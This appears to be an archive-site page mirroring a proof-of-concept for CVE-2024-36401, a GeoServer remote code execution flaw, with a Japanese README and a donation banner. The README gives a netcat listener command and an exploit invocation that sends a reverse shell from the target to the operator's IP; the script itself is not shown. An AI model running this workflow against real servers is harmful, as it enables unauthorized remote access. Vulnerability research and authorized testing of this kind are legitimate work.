Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-36401 PoC — GeoServer 安全漏洞

Source
Associated Vulnerability
Title:GeoServer 安全漏洞 (CVE-2024-36401)
Description:GeoServer是一个用 Java 编写的开源软件服务器。允许用户共享和编辑地理空间数据。 GeoServer 存在安全漏洞,该漏洞源于不安全地将属性名称解析为 XPath 表达式,可能导致远程代码执行。
Readme
# CVE-2024-36401

CVE-2024-36401の脆弱性チェック用のプログラムです。

# 使い方
まず、以下コマンドを実行し、通信の待ち受け状態にしてください。
```
nc -lvnp 9000
```

その後、別のウィンドウのターミナルでファイルを実行して下さい。

```
python CVE-2024-36401.py --target example.com --target_port 8080  --myip 172.26.16.100 --myport 9000
```
--target 相手のドメインまたはIPアドレス

--target_port 相手のサービスをホストしているポート番号

--myip 自分のIPアドレス

--myport ncで待ち受けているポート番号

# 免責事項
脆弱性の検証、学習等、ハッキングを楽しむためにお使い下さい。
いかなるシステムやネットワークへのハッキングや不正アクセスも支持も奨励もしません。
責任を持って使用し、明確な許可があるシステムでのみ使用してください。

# 参考
https://github.com/Mr-xn/CVE-2024-36401
File Snapshot

[4.0K] /data/pocs/78d1e8339b7639db92e1c87a1bceddbbcc4c03ec ├── [2.0K] CVE-2024-36401.py └── [1019] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.